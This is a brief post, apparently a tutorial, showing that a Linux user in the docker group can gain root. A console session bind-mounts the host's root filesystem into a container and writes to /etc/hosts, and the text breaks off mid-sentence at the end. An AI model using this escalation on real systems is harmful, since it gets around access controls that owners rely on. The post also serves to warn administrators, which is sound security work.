It shows how to get root privileges if you may run docker containers (participating in docker group)
By default docker is installed on OS without special configuring. If you would like to run docker containers without sudo you should be in docker group.
So participating in docker group allows to get root privileges.
See console commands below:
[coder@coder-srv ~]$ id
uid=1000(coder) gid=1000(coder) groups=1000(coder),994(docker)
[coder@coder-srv ~]$ echo 2 >> /etc/hosts
-bash: /etc/hosts: Permission denied
[coder@coder-srv ~]$ tail -n 2 /etc/hosts
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6 coder-srv
[coder@coder-srv ~]$ docker run --mount type=bind,source=/,target=/host -it ubuntu bash
root@23071637cb99:/# echo 2 >> /host/etc/hosts
root@23071637cb99:/# exit
[coder@coder-srv ~]$ tail -n 2 /etc/hosts coder-srv
There are two ways: